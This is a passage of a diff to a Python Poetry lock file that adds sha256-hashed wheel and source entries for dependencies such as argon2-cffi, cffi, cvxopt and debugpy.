+ {file = "anyio-3.3.0-py3-none-any.whl", hash = "sha256:929a6852074397afe1d989002aa96d457e3e1e5441357c60d03e7eea0e65e1b0"},
+ {file = "anyio-3.3.0.tar.gz", hash = "sha256:ae57a67583e5ff8b4af47666ff5651c3732d45fd26c929253748e796af860374"},
+]
appdirs = [
{file = "appdirs-1.4.4-py2.py3-none-any.whl", hash = "sha256:a841dacd6b99318a741b166adb07e19ee71a274450e68237b4650ca1055ab128"},
{file = "appdirs-1.4.4.tar.gz", hash = "sha256:7d5d0167b2b1ba821647616af46a749d1c653740dd0d2415100fe26e27afdf41"},
]
+appnope = [
+ {file = "appnope-0.1.2-py2.py3-none-any.whl", hash = "sha256:93aa393e9d6c54c5cd570ccadd8edad61ea0c4b9ea7a01409020c9aa019eb442"},
+ {file = "appnope-0.1.2.tar.gz", hash = "sha256:dd83cd4b5b460958838f6eb3000c660b1f9caf2a5b1de4264e941512f603258a"},
+]
+argon2-cffi = [
+ {file = "argon2-cffi-20.1.0.tar.gz", hash = "sha256:d8029b2d3e4b4cea770e9e5a0104dd8fa185c1724a0f01528ae4826a6d25f97d"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-macosx_10_6_intel.whl", hash = "sha256:6ea92c980586931a816d61e4faf6c192b4abce89aa767ff6581e6ddc985ed003"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:05a8ac07c7026542377e38389638a8a1e9b78f1cd8439cd7493b39f08dd75fbf"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-win32.whl", hash = "sha256:0bf066bc049332489bb2d75f69216416329d9dc65deee127152caeb16e5ce7d5"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27m-win_amd64.whl", hash = "sha256:57358570592c46c420300ec94f2ff3b32cbccd10d38bdc12dc6979c4a8484fbc"},
+ {file = "argon2_cffi-20.1.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:7d455c802727710e9dfa69b74ccaab04568386ca17b0ad36350b622cd34606fe"},
+ {file = "argon2_cffi-20.1.0-cp35-abi3-manylinux1_x86_64.whl", hash = "sha256:b160416adc0f012fb1f12588a5e6954889510f82f698e23ed4f4fa57f12a0647"},
+ {file = "argon2_cffi-20.1.0-cp35-cp35m-win32.whl", hash = "sha256:9bee3212ba4f560af397b6d7146848c32a800652301843df06b9e8f68f0f7361"},
+ {file = "argon2_cffi-20.1.0-cp35-cp35m-win_amd64.whl", hash = "sha256:392c3c2ef91d12da510cfb6f9bae52512a4552573a9e27600bdb800e05905d2b"},
+ {file = "argon2_cffi-20.1.0-cp36-cp36m-win32.whl", hash = "sha256:ba7209b608945b889457f949cc04c8e762bed4fe3fec88ae9a6b7765ae82e496"},
+ {file = "argon2_cffi-20.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:da7f0445b71db6d3a72462e04f36544b0de871289b0bc8a7cc87c0f5ec7079fa"},
+ {file = "argon2_cffi-20.1.0-cp37-abi3-macosx_10_6_intel.whl", hash = "sha256:cc0e028b209a5483b6846053d5fd7165f460a1f14774d79e632e75e7ae64b82b"},
+ {file = "argon2_cffi-20.1.0-cp37-cp37m-win32.whl", hash = "sha256:18dee20e25e4be86680b178b35ccfc5d495ebd5792cd00781548d50880fee5c5"},
+ {file = "argon2_cffi-20.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:6678bb047373f52bcff02db8afab0d2a77d83bde61cfecea7c5c62e2335cb203"},
+ {file = "argon2_cffi-20.1.0-cp38-cp38-win32.whl", hash = "sha256:77e909cc756ef81d6abb60524d259d959bab384832f0c651ed7dcb6e5ccdbb78"},
+ {file = "argon2_cffi-20.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:9dfd5197852530294ecb5795c97a823839258dfd5eb9420233c7cfedec2058f2"},
+ {file = "argon2_cffi-20.1.0-cp39-cp39-win32.whl", hash = "sha256:e2db6e85c057c16d0bd3b4d2b04f270a7467c147381e8fd73cbbe5bc719832be"},
+ {file = "argon2_cffi-20.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:8a84934bd818e14a17943de8099d41160da4a336bcc699bb4c394bbb9b94bd32"},
+]
astroid = [
{file = "astroid-2.6.6-py3-none-any.whl", hash = "sha256:ab7f36e8a78b8e54a62028ba6beef7561db4cdb6f2a5009ecc44a6f42b5697ef"},
{file = "astroid-2.6.6.tar.gz", hash = "sha256:3975a0bd5373bdce166e60c851cfcbaf21ee96de80ec518c1f4cb3e94c3fb334"},
]
+async-generator = [
+ {file = "async_generator-1.10-py3-none-any.whl", hash = "sha256:01c7bf666359b4967d2cda0000cc2e4af16a0ae098cbffcb8472fb9e8ad6585b"},
+ {file = "async_generator-1.10.tar.gz", hash = "sha256:6ebb3d106c12920aaae42ccb6f787ef5eefdcdd166ea3d628fa8476abe712144"},
+]
atomicwrites = [
{file = "atomicwrites-1.4.0-py2.py3-none-any.whl", hash = "sha256:6d1784dea7c0c8d4a5172b6c620f40b6e4cbfdf96d783691f2e1302a7b88e197"},
{file = "atomicwrites-1.4.0.tar.gz", hash = "sha256:ae70396ad1a434f9c7046fd2dd196fc04b12f9e91ffb859164193be8b6168a7a"},
@@ -297,10 +1165,77 @@ attrs = [
{file = "attrs-21.2.0-py2.py3-none-any.whl", hash = "sha256:149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1"},
{file = "attrs-21.2.0.tar.gz", hash = "sha256:ef6aaac3ca6cd92904cdd0d83f629a15f18053ec84e6432106f7a4d04ae4f5fb"},
]
+babel = [
+ {file = "Babel-2.9.1-py2.py3-none-any.whl", hash = "sha256:ab49e12b91d937cd11f0b67cb259a57ab4ad2b59ac7a3b41d6c06c0ac5b0def9"},
+ {file = "Babel-2.9.1.tar.gz", hash = "sha256:bc0c176f9f6a994582230df350aa6e05ba2ebe4b3ac317eab29d9be5d2768da0"},
+]
+backcall = [
+ {file = "backcall-0.2.0-py2.py3-none-any.whl", hash = "sha256:fbbce6a29f263178a1f7915c1940bde0ec2b2a967566fe1c65c1dfb7422bd255"},
+ {file = "backcall-0.2.0.tar.gz", hash = "sha256:5cbdbf27be5e7cfadb448baf0aa95508f91f2bbc6c6437cd9cd06e2a4c215e1e"},
+]
black = [
{file = "black-21.7b0-py3-none-any.whl", hash = "sha256:1c7aa6ada8ee864db745b22790a32f94b2795c253a75d6d9b5e439ff10d23116"},
{file = "black-21.7b0.tar.gz", hash = "sha256:c8373c6491de9362e39271630b65b964607bc5c79c83783547d76c839b3aa219"},
]
+bleach = [
+ {file = "bleach-4.0.0-py2.py3-none-any.whl", hash = "sha256:c1685a132e6a9a38bf93752e5faab33a9517a6c0bb2f37b785e47bf253bdb51d"},
+ {file = "bleach-4.0.0.tar.gz", hash = "sha256:ffa9221c6ac29399cc50fcc33473366edd0cf8d5e2cbbbb63296dc327fb67cc8"},
+]
+certifi = [
+ {file = "certifi-2021.5.30-py2.py3-none-any.whl", hash = "sha256:50b1e4f8446b06f41be7dd6338db18e0990601dce795c2b1686458aa7e8fa7d8"},
+ {file = "certifi-2021.5.30.tar.gz", hash = "sha256:2bbf76fd432960138b3ef6dda3dde0544f27cbf8546c458e60baf371917ba9ee"},
+]
+cffi = [
+ {file = "cffi-1.14.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:22b9c3c320171c108e903d61a3723b51e37aaa8c81255b5e7ce102775bd01e2c"},
+ {file = "cffi-1.14.6-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:f0c5d1acbfca6ebdd6b1e3eded8d261affb6ddcf2186205518f1428b8569bb99"},
+ {file = "cffi-1.14.6-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:99f27fefe34c37ba9875f224a8f36e31d744d8083e00f520f133cab79ad5e819"},
+ {file = "cffi-1.14.6-cp27-cp27m-win32.whl", hash = "sha256:55af55e32ae468e9946f741a5d51f9896da6b9bf0bbdd326843fec05c730eb20"},
+ {file = "cffi-1.14.6-cp27-cp27m-win_amd64.whl", hash = "sha256:7bcac9a2b4fdbed2c16fa5681356d7121ecabf041f18d97ed5b8e0dd38a80224"},
+ {file = "cffi-1.14.6-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:ed38b924ce794e505647f7c331b22a693bee1538fdf46b0222c4717b42f744e7"},
+ {file = "cffi-1.14.6-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:e22dcb48709fc51a7b58a927391b23ab37eb3737a98ac4338e2448bef8559b33"},
+ {file = "cffi-1.14.6-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:aedb15f0a5a5949ecb129a82b72b19df97bbbca024081ed2ef88bd5c0a610534"},
+ {file = "cffi-1.14.6-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:48916e459c54c4a70e52745639f1db524542140433599e13911b2f329834276a"},
+ {file = "cffi-1.14.6-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:f627688813d0a4140153ff532537fbe4afea5a3dffce1f9deb7f91f848a832b5"},
+ {file = "cffi-1.14.6-cp35-cp35m-win32.whl", hash = "sha256:f0010c6f9d1a4011e429109fda55a225921e3206e7f62a0c22a35344bfd13cca"},
+ {file = "cffi-1.14.6-cp35-cp35m-win_amd64.whl", hash = "sha256:57e555a9feb4a8460415f1aac331a2dc833b1115284f7ded7278b54afc5bd218"},
+ {file = "cffi-1.14.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:e8c6a99be100371dbb046880e7a282152aa5d6127ae01783e37662ef73850d8f"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:19ca0dbdeda3b2615421d54bef8985f72af6e0c47082a8d26122adac81a95872"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:d950695ae4381ecd856bcaf2b1e866720e4ab9a1498cba61c602e56630ca7195"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e9dc245e3ac69c92ee4c167fbdd7428ec1956d4e754223124991ef29eb57a09d"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a8661b2ce9694ca01c529bfa204dbb144b275a31685a075ce123f12331be790b"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b315d709717a99f4b27b59b021e6207c64620790ca3e0bde636a6c7f14618abb"},
+ {file = "cffi-1.14.6-cp36-cp36m-win32.whl", hash = "sha256:80b06212075346b5546b0417b9f2bf467fea3bfe7352f781ffc05a8ab24ba14a"},
+ {file = "cffi-1.14.6-cp36-cp36m-win_amd64.whl", hash = "sha256:a9da7010cec5a12193d1af9872a00888f396aba3dc79186604a09ea3ee7c029e"},
+ {file = "cffi-1.14.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4373612d59c404baeb7cbd788a18b2b2a8331abcc84c3ba40051fcd18b17a4d5"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:f10afb1004f102c7868ebfe91c28f4a712227fe4cb24974350ace1f90e1febbf"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:fd4305f86f53dfd8cd3522269ed7fc34856a8ee3709a5e28b2836b2db9d4cd69"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6d6169cb3c6c2ad50db5b868db6491a790300ade1ed5d1da29289d73bbe40b56"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5d4b68e216fc65e9fe4f524c177b54964af043dde734807586cf5435af84045c"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:33791e8a2dc2953f28b8d8d300dde42dd929ac28f974c4b4c6272cb2955cb762"},
+ {file = "cffi-1.14.6-cp37-cp37m-win32.whl", hash = "sha256:0c0591bee64e438883b0c92a7bed78f6290d40bf02e54c5bf0978eaf36061771"},
+ {file = "cffi-1.14.6-cp37-cp37m-win_amd64.whl", hash = "sha256:8eb687582ed7cd8c4bdbff3df6c0da443eb89c3c72e6e5dcdd9c81729712791a"},
+ {file = "cffi-1.14.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ba6f2b3f452e150945d58f4badd92310449876c4c954836cfb1803bdd7b422f0"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux1_i686.whl", hash = "sha256:64fda793737bc4037521d4899be780534b9aea552eb673b9833b01f945904c2e"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:9f3e33c28cd39d1b655ed1ba7247133b6f7fc16fa16887b120c0c670e35ce346"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:26bb2549b72708c833f5abe62b756176022a7b9a7f689b571e74c8478ead51dc"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:eb687a11f0a7a1839719edd80f41e459cc5366857ecbed383ff376c4e3cc6afd"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d2ad4d668a5c0645d281dcd17aff2be3212bc109b33814bbb15c4939f44181cc"},
+ {file = "cffi-1.14.6-cp38-cp38-win32.whl", hash = "sha256:487d63e1454627c8e47dd230025780e91869cfba4c753a74fda196a1f6ad6548"},
+ {file = "cffi-1.14.6-cp38-cp38-win_amd64.whl", hash = "sha256:c33d18eb6e6bc36f09d793c0dc58b0211fccc6ae5149b808da4a62660678b156"},
+ {file = "cffi-1.14.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:06c54a68935738d206570b20da5ef2b6b6d92b38ef3ec45c5422c0ebaf338d4d"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux1_i686.whl", hash = "sha256:f174135f5609428cc6e1b9090f9268f5c8935fddb1b25ccb8255a2d50de6789e"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:f3ebe6e73c319340830a9b2825d32eb6d8475c1dac020b4f0aa774ee3b898d1c"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c8d896becff2fa653dc4438b54a5a25a971d1f4110b32bd3068db3722c80202"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4922cd707b25e623b902c86188aca466d3620892db76c0bdd7b99a3d5e61d35f"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c9e005e9bd57bc987764c32a1bee4364c44fdc11a3cc20a40b93b444984f2b87"},
+ {file = "cffi-1.14.6-cp39-cp39-win32.whl", hash = "sha256:eb9e2a346c5238a30a746893f23a9535e700f8192a68c07c0258e7ece6ff3728"},
+ {file = "cffi-1.14.6-cp39-cp39-win_amd64.whl", hash = "sha256:818014c754cd3dba7229c0f5884396264d51ffb87ec86e927ef0be140bfdb0d2"},
+ {file = "cffi-1.14.6.tar.gz", hash = "sha256:c9a875ce9d7fe32887784274dd533c57909b7b1dcadcc128a2ac21331a9765dd"},
+]
+charset-normalizer = [
+ {file = "charset-normalizer-2.0.4.tar.gz", hash = "sha256:f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3"},
+ {file = "charset_normalizer-2.0.4-py3-none-any.whl", hash = "sha256:0c8911edd15d19223366a194a513099a302055a962bca2cec0f54b8b63175d8b"},
+]
click = [
{file = "click-8.0.1-py3-none-any.whl", hash = "sha256:fba402a4a47334742d782209a7c79bc448911afe1149d07bdabdf480b3e2f4b6"},
{file = "click-8.0.1.tar.gz", hash = "sha256:8c04c11192119b1ef78ea049e0a6f0463e4c48ef00a30160c704337586f3ad7a"},
@@ -309,10 +1244,164 @@ colorama = [
{file = "colorama-0.4.4-py2.py3-none-any.whl", hash = "sha256:9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2"},
{file = "colorama-0.4.4.tar.gz", hash = "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"},
]
+cvxopt = [
+ {file = "cvxopt-1.2.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:b5b2288a467c0c3996899c10783c8d78878aeb01d43a66697e9993ff76ac5cae"},
+ {file = "cvxopt-1.2.6-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:c57d7d2347ba98432a2ed5af3169026db6d191274c49fccb5357a7cdfb410e5b"},
+ {file = "cvxopt-1.2.6-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:0cd32bed5fec871d36d32f0a86c927e2837b9c60fc23b6f777108c3a95f248e5"},
+ {file = "cvxopt-1.2.6-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:0b335bf18f7e42326105f9090e5bb7bbdecfce3c3b4c612ca4e538b00383e937"},
+ {file = "cvxopt-1.2.6-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:97f7624837bd2e072bd909d4c53155b13a427dac6e0c2ea3d5e471443c289489"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-macosx_10_6_intel.whl", hash = "sha256:5980abb9a7e43a072dfd95e7c542e43afc2cb487f11000e33be2854dafcf15fe"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:5f2e9e308d931bd52f4dbb55073edebd03073e5f1627f82959da4b95321f89dd"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-win32.whl", hash = "sha256:fa5568d4d64e4cc24da4094c0066c67308e805287a742ad298f122f0cad360ca"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-win_amd64.whl", hash = "sha256:d505932dfe734ff14ee0c3c04fc5618bb7cc744f59e0edfed4a8851deab8ee42"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:6ab795743b0e42529d015b889576783a1264e6056417f54870c42db191482065"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:fb1149e2764e5284b560434cbc5ee7e60199fc7eaf850d5ba26d02fbc24d4006"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-win32.whl", hash = "sha256:7db648536ecef417df42108b7b779891946a6cc791b74e843d23d846c5576d1a"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-win_amd64.whl", hash = "sha256:7cd9f1c8404ed507257550f485b3394b1a38087da4ff70032dca964a73e138f3"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1e76dabd13377f6876073041beee67e4613879a1ac6a572a9254aafa8ca7f7fe"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:368caf7d2130670e6e48af0d611ae41713a98d7643f7d64a6aeabefad50e76c4"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-win32.whl", hash = "sha256:95b2cd31d57341279e98888479c71496529eade2eccf5582e671ce96ef575c38"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-win_amd64.whl", hash = "sha256:f343ddd406caec05408d007e313022a073a7466c0356ac96e20256d0b542916b"},
+ {file = "cvxopt-1.2.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:fdeb3ce110708229ee4acbd4c894ffe031e2dafb2ba6469068fed0cc20671b89"},
+ {file = "cvxopt-1.2.6-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:c420cf196c8d2733022f29e77ace46871b82f2f2a25edcb585a20c0c76bec02d"},
+ {file = "cvxopt-1.2.6-cp38-cp38-win32.whl", hash = "sha256:ba75971b78777ec10361de81a1feb6f27757b505054dbe3cfde5a4f19cccbe2e"},
+ {file = "cvxopt-1.2.6-cp38-cp38-win_amd64.whl", hash = "sha256:b7a9ee4d3ecdd0f2a190e935613073c15594b52f581e0327ba4e869277f793f7"},
+ {file = "cvxopt-1.2.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:edae9dafec8f52594ae6312b9ff811ad10d0504ca935e09aa66a309e6d7c2397"},
+ {file = "cvxopt-1.2.6-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:2bac183859127ebc473b9bc66be17c0dbc8a3c8bd0939d460cfe6d141bc545db"},
+ {file = "cvxopt-1.2.6-cp39-cp39-win32.whl", hash = "sha256:3eb14814b7b79f765e107c50b0961e71d47a36a760ccf3f1fde2ca65d75a9f11"},
+ {file = "cvxopt-1.2.6-cp39-cp39-win_amd64.whl", hash = "sha256:6e05d9f541368950bfb7b0ab1f648087397a60728fd4699fe29e90462931ac39"},
+ {file = "cvxopt-1.2.6.tar.gz", hash = "sha256:a4c433706fd0ad9d47e7f222773a7f7601766fb8e74b633524b3c3fce29aa73e"},
+]
+debugpy = [
+ {file = "debugpy-1.4.1-cp27-cp27m-macosx_10_14_x86_64.whl", hash = "sha256:a2c5a1c49239707ed5bc8e97d8f9252fb392d9e13c79c7b477593d7dde4ae24a"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:ebc241351791595796864a960892e1cd58627064feda939d0377edd0730bbff2"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:939c94d516e6ed5433cc3ba12d9d0d8108499587158ae5f76f6db18d49e21b5b"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:e47c42bc1a68ead3c39d9a658d3ccf311bc45dc84f3c90fa5cb7de1796243f47"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:3756cd421be701d06490635372327ebd1ccb44b37d59682c994f6bd59e040a91"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:a4368c79a2c4458d5a0540381a32f8fdc02b3c9ba9dd413a49b42929297b29b3"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:c96e82d863db97d3eb498cc8e55773004724bdeaa58fb0eb7ee7d5a21d240d6a"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:71e67d352cabdc6a3f4dc3e39a1d2d1e76763a2102a276904e3495ede48a9832"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:959d39f3d724d25b7ab79278f032e33df03c6376d51b3517abaf2f8e83594ee0"},
+ {file = "debugpy-1.4.1-cp35-cp35m-macosx_10_14_x86_64.whl", hash = "sha256:9d559bd0e4c288487349e0723bc70ff06390638446ee8087d4d5711486119643"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:7376bd8f4272ab01342940bd020955f021e26954e1f0df91cfa8bf1fa4451b56"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:dea62527a4a2770a0d12ce46564636d892bba29baaf5dba5bfe98bb55bf17a11"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:12cb415e7394c6738527cbc482935aa9414e9b4cc87dd040015d0e5cb8b4471a"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:3a6dee475102d0169732162b735878e8787500719ccb4d54b1458afe992a4c4d"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2014_i686.whl", hash = "sha256:7e12e94aa2c9a0017c0a84cd475063108d06e305360b69c933bde17a6a527f80"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2014_x86_64.whl", hash = "sha256:2bfda2721046fb43a7074d475a12adcd55a65bfd23a1ff675427b09a01ba40cc"},
+ {file = "debugpy-1.4.1-cp35-cp35m-win32.whl", hash = "sha256:732ac8bb79694cb4127c08bfc6128274f3dee9e6fd2ddde7bf026a40efeb202d"},
+ {file = "debugpy-1.4.1-cp35-cp35m-win_amd64.whl", hash = "sha256:bad668e9edb21199017ab31f52a05e14506ad6566110560796d2a8f258e0b819"},
+ {file = "debugpy-1.4.1-cp36-cp36m-macosx_10_14_x86_64.whl", hash = "sha256:cd36e75c0f71a924f4b4cdb5f74b3321952cf636aadf70e0f85fd9cd2edfc1d0"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:eee2224ce547d2958ffc0d63cd280a9cc6377043f32ce370cfe4ca6be4e05476"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:e6711106aafc26ecb78e43c4be0a49bd0ae4a1f3e1aa502de151e38f4717b2a2"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:768f393ffaa66a3b3ed92b06e21912a5df3e01f18fb531bcbba2f94cad1725a7"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:ab37f189b1dd0d8420545c9f3d066bd1601a1ae85b26de38f5c1ccb96cf0b042"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2014_i686.whl", hash = "sha256:00f9d14da52b87e98e26f5c3c8f1937cc496915b38f8ccb7b329336b21898678"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2014_x86_64.whl", hash = "sha256:1bc8e835a48ef23280cbaf2b70a5a2b629b9ee79685b64d974bfb8d467f4aa67"},
+ {file = "debugpy-1.4.1-cp36-cp36m-win32.whl", hash = "sha256:309909b6c85f89aea3fa10fc256b52fef3c25fee4d00e1b5f5db1ace57203a2c"},
+ {file = "debugpy-1.4.1-cp36-cp36m-win_amd64.whl", hash = "sha256:67d496890d1cada5ce924cb30178684e7b82a36b80b8868beb148db54fd9e44c"},
+ {file = "debugpy-1.4.1-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:595170ac17567773b546d40a0ff002dc350cfcd95c9233f65e79370954fb9a01"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:c5e771fcd12727f734caf2a10ff92966ae9857db0ccb6bebd1a4f776c54186a8"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:2d4c4ab934fbe1c7095d19b3d4246afe119396b49540ca5d5ad34ef01b27bd2a"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:4655824321b36b353b12d1617a29c79320412f085ecabf54524603b4c0c791e8"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:399b2c60c8e67a5d30c6e4522129e8be8d484e6064286f8ba3ce857a3927312a"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2014_i686.whl", hash = "sha256:8e63585c372873cd88c2380c0b3c4815c724a9713f5b86d1b3a1f1ac30df079e"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:52920ccb4acdbb2a9a42e0a4d60a7bbc4a34bf16fd23c674b280f8e9a8cacbd6"},
+ {file = "debugpy-1.4.1-cp37-cp37m-win32.whl", hash = "sha256:7b332ce0d1a46f0f4200d59ee78428f18301d1fb85d07402723b94e1de96951c"},
+ {file = "debugpy-1.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a19def91a0a166877c2a26b611c1ad0473ce85b1df61ae5276197375d574228b"},
+ {file = "debugpy-1.4.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:9a0cd73d7a76222fbc9f9180612ccb4ad7d7f7e4f26e55ef1fbd459c0f2f5322"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:86cd13162b752664e8ef048287a6973c8fba0a71f396b31cf36394880ec2a6bf"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:89d53d57001e54a3854489e898c697aafb2d6bb81fca596da2400f3fd7fd397c"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:7b4e399790a301c83ad6b153452233695b2f15450d78956a6d297859eb44d185"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:fece69933d17e0918b73ddeb5e23bcf789edd2a6eb0d438b09c40d51e76b9c74"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2014_i686.whl", hash = "sha256:4e0d57a8c35b20b4e363db943b909aa83f12594e2f34070a1db5fa9b7213336b"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:f77406f33760e6f13a7ff0ac375d9c8856844b61cd95f7502b57116858f0cfe1"},
+ {file = "debugpy-1.4.1-cp38-cp38-win32.whl", hash = "sha256:3d92cb2e8b4f9591f6d6e17ccf8c1a55a58857949d9a5aae0ff37b64faaa3b80"},
+ {file = "debugpy-1.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:ac2d1cdd3279806dab2119937c0769f11dee13166650aaa84b6700b30a845d10"},
+ {file = "debugpy-1.4.1-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:e7e049a4e8e362183a5a5b4ad058a1543211970819d0c11011c87c3a9dec2eaf"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:cf6b26f26f97ef3033008db7b3df7233363407d7b6cacd4bc4f8e02ce8e11df4"},
